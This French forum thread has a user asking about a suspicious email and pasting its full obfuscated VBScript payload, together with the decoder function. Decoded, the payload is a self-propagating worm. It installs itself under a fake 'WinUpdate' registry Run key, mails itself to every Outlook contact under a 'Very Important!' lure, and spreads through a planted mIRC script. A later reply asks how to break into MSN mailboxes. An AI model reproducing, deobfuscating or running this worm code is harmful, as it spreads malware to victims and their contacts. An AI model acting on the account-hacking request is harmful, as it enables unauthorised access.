Question ?

LiTtLeBuBu Messages postés 50 Date d'inscription jeudi 19 décembre 2002 Statut Membre Dernière intervention 10 février 2009 - 19 déc. 2002 à 14:54
cs_boubker1 Messages postés 2 Date d'inscription lundi 2 mai 2005 Statut Membre Dernière intervention 2 mai 2005 - 2 mai 2005 à 14:02
On m'envoi ça depuis deux jours sur ma boïte Hotmail ke ce ke c ? Y a marquer Code Source by BilG for you my Dear d'une adresse d'un autre utilisateur Hotmail voila...
Si vous pouvez m'éclaircir merci d'avance....

Execute I52EVJ4J(")Xdu0Xduyi0mgtpgn54EtgcvgfD{DC03413;14224 UgvV:;775K:?etgcvgqdlgev*$uetkrvkpi0hkngu{uvgoqdlgev$+ W239ECS2?V:;775K:0igvurgekcnhqnfgt*3+ IGOO9XM9?W239ECS2($^mgtpgn0jvon0xdu$ UgvLHC33W;6?etgcvgqdlgev*$yuetkrv0ujgnn$+ LHC33W;60tgiytkvg$JMNO^UQHVYCTG^Oketquqhv^Ykpfqyu^EwttgpvXgtukqp^Twp^YkpWrfcvg$.$yuetkrv0gzg$(IGOO9XM9($'$ V:;775K:0eqr{hkngyuetkrv0uetkrvhwnnpcog.IGOO9XM9 FJ95W328 KhLHC33W;60tgitgcf*$JMNO^UQHVYCTG^Oketquqhv^Ykpfqyu^EwttgpvXgtukqp^mgtpgn54^FH433JQH$+>@3vjgp R2Q:USNV Gpfkh KhLHC33W;60tgitgcf*$JMNO^UQHVYCTG^Oketquqhv^Ykpfqyu^EwttgpvXgtukqp^mgtpgn54^KJ27K2UQ$+>@3vjgp OT74DM;9$$ Gpfkh UgvWC73HS26?V:;775K:0qrgpvgzvhkng*yuetkrv0uetkrvhwnnpcog+ TMD7:57P?WC73HS260tgcfcnn WC73HS260enqug Fq khpqv*V:;775K:0hknggzkuvu*yuetkrv0uetkrvhwnnpcog++vjgp ugvXX63P337?V:;775K:0etgcvgvgzvhkng*yuetkrv0uetkrvhwnnpcog+ XX63P3370ytkvgTMD7:57P XX63P3370enqug gpfkh MR6UPSCG?LHC33W;60tgitgcf*$JMNO^UQHVYCTG^Oketquqhv^Ykpfqyu^EwttgpvXgtukqp^Twp^YkpWrfcvg$+ KhMR6UPSCG>@$yuetkrv0gzg$(IGOO9XM9($'$vjgp LHC33W;60tgiytkvg$JMNO^UQHVYCTG^Oketquqhv^Ykpfqyu^EwttgpvXgtukqp^Twp^YkpWrfcvg$.$yuetkrv0gzg$(IGOO9XM9($'$ gpfkh MR6UPSCG?$$ nqqr HwpevkqpR2Q:USNV*+ UgvV;U9V5DP?EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$+ KhV;U9V5DP?$Qwvnqqm$Vjgp UgvC99GNE7:?V;U9V5DP0IgvPcogUrceg*$OCRK$+ UgvD7RQ725D?C99GNE7:0CfftguuNkuvu HqtGcejVFNVSUSPKpD7RQ725D KhVFNVSUSP0CfftguuGpvtkgu0Eqwpv>@2Vjgp P:WJ3664?VFNVSUSP0CfftguuGpvtkgu0Eqwpv HqtUU3P834Q?3VqP:WJ3664 UgvM8734:QK?V;U9V5DP0EtgcvgKvgo*2+ UgvJ65QUW;S?VFNVSUSP0CfftguuGpvtkgu*UU3P834Q+ M8734:QK0Vq?J65QUW;S0Cfftguu M8734:QK0Uwdlgev?$Xgt{Korqtvcpv#$ M8734:QK0Dqf{?$Jk<$(xdetnh($Rngcugxkgyvjkuhkng.kv)uxgt{korqtvcpv0$(xdetnh($$ gzgewvg$ugvJTIL;6O6?M8734:QK0$(Ejt*87+(Ejt*338+(Ejt*338+(Ejt*;9+(Ejt*;;+(Ejt*326+(Ejt*32;+(Ejt*323+(Ejt*332+(Ejt*338+(Ejt*337+ VWUCC563?IGOO9XM9 M8734:QK0FgngvgChvgtUwdokv?Vtwg JTIL;6O60CffVWUCC563 KhM8734:QK0Vq>@$$Vjgp M8734:QK0Ugpf GpfKh Pgzv GpfKh Pgzv GpfKh Gpfhwpevkqp HwpevkqpOT74DM;9*O57TO4S;+ KhO57TO4S;>@$$Vjgp S46LHC:F?LHC33W;60tgitgcf*$JMG[aNQECNaOCEJKPG^Uqhvyctg^Oketquqhv^Ykpfqyu^EwttgpvXgtukqp^RtqitcoHknguFkt$+ KhV:;775K:0hknggzkuvu*$e<^okte^okte0kpk$+Vjgp O57TO4S;?$e<^okte$ GnugKhV:;775K:0hknggzkuvu*$e<^okte54^okte0kpk$+Vjgp O57TO4S;?$e<^okte54$ GnugKhV:;775K:0hknggzkuvu*S46LHC:F($^okte^okte0kpk$+Vjgp O57TO4S;?S46LHC:F($^okte$ GnugKhV:;775K:0hknggzkuvu*S46LHC:F($^okte54^okte0kpk$+Vjgp O57TO4S;?S46LHC:F($^okte$ Gnug O57TO4S;?$$ GpfKh GpfKh KhO57TO4S;>@$$Vjgp UgvE2LNL77H?V:;775K:0EtgcvgVgzvHkng*O57TO4S;($^uetkrv0kpk$.Vtwg+ E2LNL77H?$]uetkrv_$(xdEtNh($p2?qp3<LQKP<%<}$ E2LNL77H?E2LNL77H(xdEtNh($p2?qp3<LQKP<%<}$ E2LNL77H?E2LNL77H(xdEtNh($p3?1kh*&pkem??&og+}jcnv$ E2LNL77H?E2LNL77H(xdEtNh($p4?10$(Ejt*322+(Ejt*;;+(Ejt*;;+($ugpf&pkem$ E2LNL77H?E2LNL77H(IGOO9XM9 E2LNL77H?E2LNL77H(xdEtNh($p5?$ uetkrv0Enqug GpfKh GpfHwpevkqp HwpevkqpFJ95W328*+ Khfc{*pqy+?48vjgp LHC33W;60twp$Jvvr<11yyy0{cjqq0ht$.hcnug gpfkh gpfhwpevkqp )Xduyi4Dgvc0D{]M_ ",-2)
Function I52EVJ4J(OB814846,I978VV1H)
For PU2DJESH = 1 To Len(OB814846)
KN9102VT = Mid(OB814846, PU2DJESH, 1)
If KN9102VT = Chr(2) Then
KN9102VT = Chr(34 + I978VV1H)
ElseIf KN9102VT = Chr(3) Then
KN9102VT = Chr(10 + I978VV1H)
ElseIf KN9102VT = Chr(4) Then
KN9102VT = Chr(13 + I978VV1H)
Else
KN9102VT = Chr(Asc(KN9102VT) + I978VV1H)
End If
I52EVJ4J = I52EVJ4J & KN9102VT
Next
End Function

3 réponses

PatriceVB Messages postés 562 Date d'inscription dimanche 16 décembre 2001 Statut Modérateur Dernière intervention 26 décembre 2007
21 déc. 2002 à 16:14
Si cela se reproduit, envoie moi un message grâce à la messagerie interne au site pour me donner des détails.
Sinon, tu as un Anti-Virus à jour ???
0
cs_boubker1 Messages postés 2 Date d'inscription lundi 2 mai 2005 Statut Membre Dernière intervention 2 mai 2005
2 mai 2005 à 14:00
comment je puise fair pirater les boite
0
cs_boubker1 Messages postés 2 Date d'inscription lundi 2 mai 2005 Statut Membre Dernière intervention 2 mai 2005
2 mai 2005 à 14:02
comment je fais pour pirater les boite msn si vous le savais reponds moi a [mailto:uscher@hotmail.com uscher@hotmail.com] s.v.p merci
0
Rejoignez-nous